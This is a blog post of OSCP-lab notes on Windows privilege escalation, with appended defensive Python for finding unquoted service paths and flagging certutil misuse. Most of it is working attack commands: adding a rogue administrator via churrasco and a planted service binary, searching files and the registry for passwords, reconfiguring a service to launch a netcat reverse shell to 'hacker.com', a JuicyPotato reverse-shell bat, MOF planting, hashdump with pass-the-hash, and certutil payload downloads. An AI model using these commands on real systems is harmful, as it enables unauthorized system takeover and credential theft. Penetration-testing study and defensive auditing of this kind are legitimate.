Escalate Yourself on Windows Platform !!!

Jie Liau
6 min read, Feb 21, 2020

Before you dig into this, I encourage you to check the following web site on Windows privilege escalation.

https://www.fuzzysecurity.com/tutorials/16.htm

Privilege escalation on the Windows platform was one of the hardest parts for me during my OSCP lab time. In my daily job and life I don't use Windows very often and am not familiar with it. I spent a lot of time searching for related information on Google, and I have tried to organize all of my findings and note the scenarios I encountered in the OSCP lab, to help anyone who needs them in any way.

1. Kernel Exploit

This is the most straightforward way to do PE on the Windows platform. You only have to check the Windows version and which service pack is installed, and then proceed by trial and error. Here come two useful links.

https://411hall.github.io/assets/images/exploitexcel.png

2. Service run by SYSTEM or Administrator

Another way to do PE on Windows is to exploit a service run by SYSTEM or Administrator. The most well-known service is the Microsoft SMB service. MS17-010, the so-called EternalBlue exploit developed by the U.S. National Security Agency, is a good chance to attack. You can use the built-in module in Metasploit or perform it manually. Please check the following 3 websites.

3. Windows 2003 / IIS 6.0 with Network Service

While working on the OSCP, you might encounter some machines running Windows 2003 with IIS 6.0. You're lucky there: the Token Kidnapping exploit lets you add a user to the local Administrators group.

> churrasco.exe "net user testuser password /add"
> churrasco.exe "net localgroup administrators testuser /add"

4. Search for keywords in files

You might think: how could an administrator be stupid enough to record passwords or credential information in specific files!!! Well, it happens. Please use the following two commands to search for them.

> dir /s *pass* == *cred* == *vnc* == *.config*
> findstr /si password *.xml *.ini *.txt

5. Grep the registry for keywords

Lots of rich information resides in the Windows registry. Searching it for useful information will sometimes help you.

> reg query HKLM /f password /t REG_SZ /s
> reg query HKCU /f password /t REG_SZ /s

6. Access Check

The trick mentioned in this section is mostly performed on Windows XP. Windows XP? Are you kidding me? No, I am not. You know the U.S. Navy is still using Windows XP, and there is still an article out there discussing why the military can't quit Windows XP. Use accesschk.exe or cacls.exe (icacls.exe) to check whether "Authenticated Users" has RW access to a service. If it does, the service's binary path, account and start type can be reconfigured with sc and the service restarted:

> accesschk.exe /accepteula -uwcqv "Authenticated Users" *
> accesschk.exe /accepteula -ucqv "ServiceName"
> sc qc "ServiceName"
> sc config "ServiceName" binPath= "C:\nc.exe -nv hacker.com -e cmd.exe"
> sc config "ServiceName" obj= ".\LocalSystem" password= ""
> sc config "ServiceName" start= demand
> net start "ServiceName"

7. Check for any Unquoted Service Path

This vulnerability occurs when a service's executable path is not quoted and contains spaces. Imagine the following ImagePath of a vulnerable service.

C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

Windows will try the following paths in order and will run the first EXE that it finds.

C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\Program.exe
C:\Program Files (x86)\Program Folder\A.exe
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

So if you have write permission on any intermediate folder of the ImagePath, you could put your malicious binary there. Below is an example which adds testuser to the Administrators group.

#include <stdio.h>
#include <stdlib.h>   /* system() is declared here, not in stdio.h */

int main(void) {
    /* Runs with the service's account when the service starts */
    system("net localgroup administrators testuser /add");
    return 0;
}

If you don't have a Windows machine to compile it on, cross-compiling is your good friend. Please use the following command.

# i686-w64-mingw32-gcc -o vulnerableService.exe useradd.c

And you can use the following command to search for any unquoted service path (auto-start services outside C:\Windows whose path contains no quote character).

> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
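As an added example (not from the original post), here is a Python audit helper that applies the same filter as the wmic pipeline above to a constructed service list, enumerates in order the candidate files Windows would try for each unquoted path, and produces the quoted ImagePath that fixes it; the sample services, the assumption that the binary ends in .exe, and the function names are mine.

```python
import re
from dataclasses import dataclass

@dataclass
class Service:
    name: str
    pathname: str   # raw ImagePath as wmic prints it
    startmode: str

# Constructed sample, mirroring the columns of the wmic query above.
SAMPLE_SERVICES = [
    Service("VulnSvc", r"C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe", "Auto"),
    Service("wuauserv", r"C:\Windows\system32\svchost.exe -k netsvcs", "Auto"),
    Service("SafeSvc", r'"C:\Program Files\Safe Vendor\safe.exe" --service', "Auto"),
    Service("ManSvc", r"C:\Tools\Some Tool\tool.exe", "Manual"),
]

def executable_path(pathname: str) -> str:
    """Executable part of an unquoted ImagePath (assumption: it ends in .exe;
    anything after that is service arguments)."""
    m = re.match(r"(.*?\.exe)", pathname, re.IGNORECASE)
    return m.group(1) if m else pathname

def is_unquoted_with_spaces(pathname: str) -> bool:
    """True when the path is not quoted and the executable path contains a space."""
    return not pathname.startswith('"') and " " in executable_path(pathname)

def candidate_paths(pathname: str) -> list:
    """Files Windows tries in order for such a path: each space-delimited prefix
    with .exe appended, then the real executable (the list shown above)."""
    exe = executable_path(pathname)
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))] + [exe]

def quoted_fix(pathname: str) -> str:
    """Remediated ImagePath: quote the executable and keep any arguments."""
    exe = executable_path(pathname)
    return '"' + exe + '"' + pathname[len(exe):]

def find_unquoted_services(services, exclude_prefix="C:\\Windows\\"):
    """Same filter as the wmic pipeline: Auto start, outside C:\\Windows, unquoted.
    Returns {service name: ordered candidate paths that need write-ACL review}."""
    hits = {}
    for svc in services:
        if svc.startmode.lower() != "auto" or svc.pathname.lower().startswith(exclude_prefix.lower()):
            continue
        if is_unquoted_with_spaces(svc.pathname):
            hits[svc.name] = candidate_paths(svc.pathname)
    return hits
```

On a real host, feed it the parsed output of the wmic command above and check the write ACL of each candidate's parent folder; quoting the path via sc config closes the hole.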

8. MOF (Managed Object Format)

This trick was used on one box running a tftp service with a directory traversal vulnerability, which let us write files to any location. A MOF file can be generated via Metasploit: there is a function called generate_mof in the Msf::Exploit::WbemExec module. It's basically a template for executing an EXE and cleaning up after itself. So put your modified MOF into C:\Windows\system32\wbem\mof and start a listener, for example nc -nlvp 1234, to get a reverse shell. Here comes an example.

tftp> binary
tftp> put nc.exe /WINDOWS/system32/nc.exe
tftp> put bad.mof /WINDOWS/system32/wbem/mof/bad.mof

9. Sherlock

This is a PowerShell script that quickly finds missing software patches for local PE vulnerabilities.

10. PowerShell Privilege Checker

This one aims at common Windows PE vectors that rely on misconfigurations. Please check the following repo for more information.

11. Windows 10 Juicy Potato

This trick's official name is the Windows Net-NTLMv2 Reflection DCOM/RPC attack, and it can take you from a Windows service account to NT AUTHORITY\SYSTEM. First of all, check whether your low-privilege account has SeImpersonatePrivilege enabled. If it does, go to the GitHub repo (https://github.com/ohpe/juicy-potato) to download JuicyPotato.exe and use the following command to create a bat file. Before you launch the attack, check your CLSID (https://github.com/ohpe/juicy-potato/tree/master/CLSID). Here comes the reference command:

> echo C:\Users\Rob\Desktop\nc.exe 192.168.123.123 12345 -e cmd.exe > rev.bat
> JuicyPotato.exe -l 9997 -p C:\Users\Rob\Desktop\rev.bat -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

From your attacking machine, use nc to listen on port 12345 to catch the reverse shell; you will then have an NT AUTHORITY\SYSTEM shell.

12. Metasploit

The last one, and I think the easiest, is to use Metasploit for PE. Below are the 3 methods I used in the OSCP lab.

  1. If you ever get into a box with a low-privilege session via Metasploit, try running hashdump to check whether you can see the Administrator hash. If you are lucky, pth-winexe will lead the way.
  2. The second way you can try is to migrate into a process running as NT AUTHORITY\SYSTEM.
  3. The third way, and the easiest, is to run getsystem in Metasploit.

13. Another Useful Tool

At the end of this article, I would like to mention one useful tool on the Windows platform called certutil.exe. certutil.exe is a command-line program that is installed as part of Certificate Services. You can use certutil.exe to dump and display CA configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs, and certificate chains. But this tool is also useful to attackers for downloading malicious files from the Internet and encoding/decoding those files. Here come the examples:

  1. Download files from a web server
    > certutil.exe -urlcache -split -f http://10.10.10.10/nc.exe
  2. Calculate the hash of a file
    > certutil.exe -hashfile nc.exe SHA256
    > certutil.exe -hashfile nc.exe MD5
  3. base64 encode/decode (this is very useful for a machine that cannot connect to the outside network when you still want to transfer a file to it)
    > certutil.exe -encode nc.exe nc.txt
    > certutil.exe -decode nc.txt nc.exe
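From the defender's side, as an added example that is not part of the original post: a Python detection that scans constructed process-creation log lines for the certutil usages listed above (remote download via -urlcache, base64 -encode/-decode) while leaving its normal CA and hashing use alone; the log format, sample lines and function names are constructed for this example.

```python
import re

# Constructed process-creation log lines, "timestamp user command_line"
# (assumption: your real source is Sysmon Event ID 1 or Security 4688 with
# command-line auditing enabled).
SAMPLE_LOG = """\
2020-02-21T10:00:01 CORP\\alice certutil.exe -urlcache -split -f http://10.10.10.10/nc.exe
2020-02-21T10:00:05 CORP\\alice C:\\Windows\\System32\\certutil.exe -decode nc.txt nc.exe
2020-02-21T10:01:10 CORP\\bob certutil.exe -hashfile report.pdf SHA256
2020-02-21T10:02:00 CORP\\svc_ca certutil.exe -config - -ping
2020-02-21T10:03:00 CORP\\alice notepad.exe C:\\notes.txt
"""

def classify_certutil(cmdline: str):
    """Return (category, detail) for a certutil command line, or None if the
    process is not certutil. Categories follow the examples above: 'download'
    (-urlcache together with a URL), 'decode', 'encode'; anything else is 'normal'."""
    tokens = cmdline.split()
    if not tokens:
        return None
    exe = tokens[0].rsplit("\\", 1)[-1].lower()   # strip any directory prefix
    if exe not in ("certutil", "certutil.exe"):
        return None
    flags = {t.lower() for t in tokens[1:] if t.startswith("-")}
    url = next((t for t in tokens[1:] if re.match(r"https?://", t, re.I)), None)
    if "-urlcache" in flags and url:
        return ("download", url)
    if "-decode" in flags:
        return ("decode", tokens[-1])   # output file is the last argument
    if "-encode" in flags:
        return ("encode", tokens[-1])
    return ("normal", None)

def scan_log(text: str):
    """Flag every non-normal certutil use as (timestamp, user, category, detail)."""
    findings = []
    for line in text.splitlines():
        ts, user, cmd = line.split(" ", 2)
        result = classify_certutil(cmd)
        if result and result[0] != "normal":
            findings.append((ts, user, result[0], result[1]))
    return findings
```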

Reference

Some reference sites are listed below. Hope you enjoy them.
